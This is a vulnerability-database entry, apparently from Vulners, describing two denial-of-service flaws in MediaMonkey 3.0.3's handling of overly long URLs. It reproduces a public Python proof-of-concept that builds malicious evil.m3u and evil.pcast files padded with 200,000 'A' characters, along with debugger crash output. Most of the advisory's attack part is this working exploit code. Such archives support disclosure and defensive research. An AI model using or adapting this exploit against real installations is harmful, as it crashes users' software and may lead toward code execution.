Vulners
Lucene search
MediaMonkey 3.0.3 URI Handling Multiple Denial of Service Vulnerabilities
source: http://www.securityfocus.com/bid/30251/info
MediaMonkey is prone to two denial-of-service vulnerabilities because it fails to handle user-supplied input.
An attacker can exploit these issues to crash the application. Given the nature of these vulnerabilities, the attacker may also be able to execute arbitrary code, but this has not been confirmed.
MediaMonkey 3.0.3 is vulnerable; other versions may also be affected.
#!/usr/bin/python
# MediaMonkey 3.0.3 [.m3u] & [.pcast] url handling DOS
#This script will generate 2 files called evil.m3u and evil.pcast.
#In both cases the vulnerability resides in failure to handle overly long urls.
#[.m3u descr]
#The vulnerability exists in several places within the url.In this case
#we are going to use the file name part of the url.
#Open evil.m3u in MediaMonkey then play it.Or double click the .m3u file
#and it will try to play automatically.
#Debugger output on crash:
# ----------------------------------------------------------------
# Exception C0000005 (ACCESS_VIOLATION reading [31F518F0])
# ----------------------------------------------------------------
# EAX=FFFFFFFF: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EBX=00000002: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# ECX=0CF203D9: 2F 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
# EDX=0CF203D9: 2F 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
# ESP=0CC5AF38: 31 32 37 2E 30 2E 30 2E-31 2F 41 41 41 41 41 41
# EBP=0CCBFF7C: B4 FF CB 0C 18 63 54 03-B8 49 55 03 08 3F 5B 03
# ESI=25031517: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDI=0CCBFF5D: 03 F2 0C D9 03 F2 0C 26-00 00 00 48 00 F1 0C 78
# EIP=035445A8: 8A 14 0E 8D 04 0E 80 FA-2F 0F 84 13 01 00 00 80
# --> MOV DL,[ESI+ECX*1]
# ----------------------------------------------------------------
#
#[.pcast descr]
#Just as in the .m3u case the vulnerability manifests in several places within
#the url.In this case we will use the filename too.
#Double click or "open with" evil.pcast in MediaMonkey.The program will
#start consuming 100% cpu thus becaming unusable.
#
#Found by: Shinnok raydenxy [at] yahoo dot com
m3u = 'http://127.0.0.1/'
badstr = 'A' * 200000
m3u += badstr
m3u += '.mp3'
f = open('evil.m3u','wb')
f.write(m3u);
f.close
pcast = '<?xml version="1.0" encoding="UTF-8"?>\n<pcast version="1.0">\n<channel>\n<link rel="feed" type="application/rss+xml" href="http://127.0.0.1/'
badstr = 'A'* 200000
pcast += badstr
pcast += '.xml"/></link>\n</channel>\n</pcast>\n'
f = open('evil.pcast','wb')
f.write(pcast);
f.close
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1